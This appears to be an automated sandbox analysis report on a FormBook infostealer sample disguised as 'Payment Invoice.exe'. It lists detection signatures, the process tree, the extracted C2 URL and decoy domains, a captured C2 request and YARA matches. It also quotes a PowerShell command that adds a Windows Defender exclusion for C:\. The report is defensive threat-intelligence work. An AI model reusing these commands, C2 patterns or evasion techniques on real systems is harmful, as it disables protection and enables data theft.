Loading ...

Play interactive tourEdit tour

Analysis Report Payment Invoice.exe

Overview

General Information

Sample Name:Payment Invoice.exe
Analysis ID:385452
MD5:ebfeaa73811b084ff7ec882503205988
SHA1:893e9fd1b6f1ccb56dbc389799b93ecbf116ee74
SHA256:bde02a4b70a0070b28f0e812f6f7a857f2d57e2c8b6f3d0f11c9bb6a66cdc05a
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Payment Invoice.exe (PID: 6860 cmdline: 'C:\Users\user\Desktop\Payment Invoice.exe' MD5: EBFEAA73811B084FF7EC882503205988)
    • powershell.exe (PID: 6680 cmdline: 'powershell' Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Payment Invoice.exe (PID: 6744 cmdline: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe MD5: EBFEAA73811B084FF7EC882503205988)
    • Payment Invoice.exe (PID: 6948 cmdline: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe MD5: EBFEAA73811B084FF7EC882503205988)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 6752 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • WWAHost.exe (PID: 6992 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 5904 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\Payment Invoice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.the-techs.info/chue/"], "decoy": ["wowmovies.today", "magentos6.com", "bi-nav.com", "atlantahawks.sucks", "wluabjy.icu", "kevableinsights.com", "lavidaenaustralia.com", "stonermadeapparel.net", "sondein.com", "cirquedusoleilartist.com", "kanjitem.com", "tomofalltrades.site", "mecanico.guru", "tech2020s.com", "amesoneco.com", "theawfulliar.com", "californiaadugurus.com", "rentalservicesolutions.com", "fsxbhd.club", "casino-seo.com", "asknesto.com", "get-rangextd.com", "gkwill.com", "juliegiles.net", "pagosafreedom.com", "wbpossiblellc.com", "fhjfyutotyhfse.com", "sexshopsatelite.com", "shellykraftlaw.com", "motherhenscoop.com", "mboklanjar.com", "redwoodcityswing.com", "haier-mz.com", "metalinjectionltd.asia", "franquiaoriginal.com", "mcronaldfood.com", "mobilegymconcierge.com", "haifu168.com", "apeiro.life", "thejosephnashvilletn.com", "bensbrickstore.com", "sanctumwell.com", "beanexthomie.com", "stylazhaircare.com", "jordanvanvleet.com", "jdwx400.com", "francescoricco.com", "gameshowsatschool.com", "alqymist-monaco.com", "infinitysportsmassage.com", "algorithmrecruitment.com", "tanyasubatang.com", "impressivebackyard.com", "wwwgocashwire.com", "visual-pioneers.net", "thememo-mobilebar.com", "wagner-fahrschulegmbh.com", "minterfortexas.com", "codelopers.com", "inyarsb.icu", "ravenlightproductions.com", "germiblock.com", "coutinhoefelipeadv.com", "diegobr1307.life"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Payment Invoice.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\Payment Invoice.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18419:$sqlite3step: 68 34 1C 7B E1
        • 0x1852c:$sqlite3step: 68 34 1C 7B E1
        • 0x18448:$sqlite3text: 68 38 2A 90 C5
        • 0x1856d:$sqlite3text: 68 38 2A 90 C5
        • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
        00000001.00000002.716578799.00000000004E2000.00000002.00020000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          0000000D.00000002.714247594.0000000000142000.00000002.00020000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 30 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            21.2.WWAHost.exe.3bef834.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              14.0.Payment Invoice.exe.c20000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                21.2.WWAHost.exe.3bef834.4.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  13.0.Payment Invoice.exe.140000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    14.2.Payment Invoice.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
                      Click to see the 12 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.the-techs.info/chue/"], "decoy": ["wowmovies.today", "magentos6.com", "bi-nav.com", "atlantahawks.sucks", "wluabjy.icu", "kevableinsights.com", "lavidaenaustralia.com", "stonermadeapparel.net", "sondein.com", "cirquedusoleilartist.com", "kanjitem.com", "tomofalltrades.site", "mecanico.guru", "tech2020s.com", "amesoneco.com", "theawfulliar.com", "californiaadugurus.com", "rentalservicesolutions.com", "fsxbhd.club", "casino-seo.com", "asknesto.com", "get-rangextd.com", "gkwill.com", "juliegiles.net", "pagosafreedom.com", "wbpossiblellc.com", "fhjfyutotyhfse.com", "sexshopsatelite.com", "shellykraftlaw.com", "motherhenscoop.com", "mboklanjar.com", "redwoodcityswing.com", "haier-mz.com", "metalinjectionltd.asia", "franquiaoriginal.com", "mcronaldfood.com", "mobilegymconcierge.com", "haifu168.com", "apeiro.life", "thejosephnashvilletn.com", "bensbrickstore.com", "sanctumwell.com", "beanexthomie.com", "stylazhaircare.com", "jordanvanvleet.com", "jdwx400.com", "francescoricco.com", "gameshowsatschool.com", "alqymist-monaco.com", "infinitysportsmassage.com", "algorithmrecruitment.com", "tanyasubatang.com", "impressivebackyard.com", "wwwgocashwire.com", "visual-pioneers.net", "thememo-mobilebar.com", "wagner-fahrschulegmbh.com", "minterfortexas.com", "codelopers.com", "inyarsb.icu", "ravenlightproductions.com", "germiblock.com", "coutinhoefelipeadv.com", "diegobr1307.life"]}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeReversingLabs: Detection: 29%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Payment Invoice.exeVirustotal: Detection: 33%Perma Link
                      Source: Payment Invoice.exeReversingLabs: Detection: 29%
                      Yara detected FormBookShow sources
                      Source: Yara matchFile source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: Payment Invoice.exeJoe Sandbox ML: detected
                      Source: 14.2.Payment Invoice.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: Payment Invoice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      Source: Payment Invoice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: WWAHost.pdb source: Payment Invoice.exe, 0000000E.00000002.783465280.0000000003370000.00000040.00000001.sdmp
                      Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.750469066.0000000005A00000.00000002.00000001.sdmp
                      Source: Binary string: WWAHost.pdbUGP source: Payment Invoice.exe, 0000000E.00000002.783465280.0000000003370000.00000040.00000001.sdmp
                      Source: Binary string: wntdll.pdbUGP source: Payment Invoice.exe, 0000000E.00000002.782780518.00000000017BF000.00000040.00000001.sdmp, WWAHost.exe, 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: Payment Invoice.exe, WWAHost.exe
                      Source: Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: Payment Invoice.exe, 00000001.00000002.720984105.00000000039B9000.00000004.00000001.sdmp
                      Source: Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.750469066.0000000005A00000.00000002.00000001.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 4x nop then pop esi
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop esi

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: www.the-techs.info/chue/
                      Source: global trafficHTTP traffic detected: GET /chue/?Bxl4iL=G9TtVN5R6EJkOjOehstyspBsMB8h6uPP4SNtk4flZ+Q+zaxTbo8GQGYSWt4KCoCWgLKd&xPZTBf=dn-paHGxXlDP HTTP/1.1Host: www.minterfortexas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                      Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
                      Source: global trafficHTTP traffic detected: GET /chue/?Bxl4iL=G9TtVN5R6EJkOjOehstyspBsMB8h6uPP4SNtk4flZ+Q+zaxTbo8GQGYSWt4KCoCWgLKd&xPZTBf=dn-paHGxXlDP HTTP/1.1Host: www.minterfortexas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                      Source: unknownDNS traffic detected: queries for: www.the-techs.info
                      Source: powershell.exe, 0000000B.00000003.788406161.0000000008D63000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft
                      Source: powershell.exe, 0000000B.00000003.788406161.0000000008D63000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft.co4
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: Payment Invoice.exe, 00000001.00000002.720984105.00000000039B9000.00000004.00000001.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                      Source: Payment Invoice.exe, 00000001.00000002.720684926.0000000002A45000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: explorer.exe, 0000000F.00000002.911585809.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: Payment Invoice.exe, 00000001.00000002.720984105.00000000039B9000.00000004.00000001.sdmpString found in binary or memory: http://www.newtonsoft.com/jsonschema
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: powershell.exe, 0000000B.00000003.790519826.0000000005AE1000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                      Source: Payment Invoice.exe, 00000001.00000002.719312419.0000000000D1A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      barindex
                      Yara detected FormBookShow sources
                      Source: Yara matchFile source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Malicious sample detected (through community Yara rule)Show sources
                      Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: Payment Invoice.exe
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0041A060 NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0041A110 NtAllocateVirtualMemory,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_00419F30 NtCreateFile,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_00419FE0 NtReadFile,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0041A10A NtAllocateVirtualMemory,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709910 NtAdjustPrivilegesToken,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017099A0 NtCreateSection,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709860 NtQuerySystemInformation,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709840 NtDelayExecution,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017098F0 NtReadVirtualMemory,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709A50 NtCreateFile,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709A20 NtResumeThread,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709A00 NtProtectVirtualMemory,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709540 NtReadFile,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017095D0 NtClose,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709710 NtQueryInformationToken,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017097A0 NtUnmapViewOfSection,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709780 NtMapViewOfSection,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709660 NtAllocateVirtualMemory,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017096E0 NtFreeVirtualMemory,LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709950 NtQueueApcThread,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017099D0 NtCreateProcessEx,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0170B040 NtSuspendThread,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709820 NtEnumerateKey,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017098A0 NtWriteVirtualMemory,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709B00 NtSetValueKey,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0170A3B0 NtGetContextThread,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01709A10 NtQuerySection,
